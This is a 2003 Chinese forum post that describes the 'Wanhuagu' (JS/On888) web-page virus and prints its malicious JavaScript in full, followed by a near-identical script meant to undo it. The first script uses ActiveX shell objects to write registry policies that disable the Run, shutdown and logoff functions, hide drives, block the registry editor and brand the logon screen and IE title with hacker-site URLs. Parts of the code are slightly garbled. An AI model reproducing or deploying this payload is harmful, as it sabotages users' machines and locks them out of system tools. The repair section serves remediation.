返回列表 发帖
bigblock 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
bigblock发表于 2003-10-9 20:09 | 只看该作者

[原创]"万花谷"病毒源代码

该病毒的技术特征:
JS/On888是一个新的含有有害代码的ActiveX网页文件,它通过在一个网络地址来对计算机用户造成破坏
,其破坏特性如下:
 (1)用户不能正常使用WINDOWS的DOS功能程序;
 (2)用户不能正常退出WINDOWS,
 (3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关
闭REGEDIT命令等。
 (4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。
具体的表现形式是:
 a:网络地址是:www.on888.xxx.xxx.com;
 b:在IE的"收藏夹"中自动加上"万花谷"的快捷方式,网络地址是:"http://96xx.xxx.com";
  下面,作者提供病毒代码的分析,及对其修复的代码:
  之所以将病毒命名为JS/xxxxx,其原因就是因为它是在页面中使用了恶意的JavaScript代码:
  让我们看看HTML页面是如何修改IE标题的:
  首先,利用了下面这段JavaScript代码修改了HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\
和 HKCU\Software\Microsoft\Internet
Explorer\Main\ 中的Window Title这个键的键值;并修改了用户的许多IE设置,如消除RUN按纽、消除
关闭按纽、消除注销按纽、隐藏桌面、隐藏盘
符、禁止注册表等。以下就是这个病毒的代码:

document.write("");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (documents .cookies.indexOf("Chg") == -1)
{
//Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://com.6to23.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoRun", 01, "REG_BINARY"); //消除RUN按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoClose", 01, "REG_BINARY"); //消除关闭按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoLogOff", 01, "REG_BINARY"); //消除注销按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoDrives", "63000000", "REG_DWORD"); //隐藏盘符
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\System\\DisableRegistryTools", "00000001", "REG_DWORD"); //禁止注册表
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
\\LegalNoticeCaption", "您的计算机已经被http://www.cnhack.org/优化: )");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
\\LegalNoticeText", "您的计算机已经被http://www.cnhack.org/优化: )");
//设置开机提示
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
"新的标题★http://com.6to23.com/ & http://www.cnhack.org/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
"新的标题★http://com.6to23.com/ & http://www.cnhack.org/");
//设置IE标题
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
以下是利用一段类似的JavaScript代码修复各项的键值:
document.write("");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
//Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://com.6to23.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoRun", 00, "REG_BINARY"); //修复RUN按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoClose", 00, "REG_BINARY"); //修复关闭按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoLogOff", 00, "REG_BINARY"); //修复注销按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoDrives", "00000000", "REG_DWORD"); //取消隐藏盘符
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\System\\DisableRegistryTools", "00000000", "REG_DWORD"); //取消禁止注册表
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
\\LegalNoticeCaption", "");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
\\LegalNoticeText", "");
//重设开机提示
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
"Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
"Microsoft Internet Explorer"); //重设IE标题
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
收藏 分享

返回列表 回复 发帖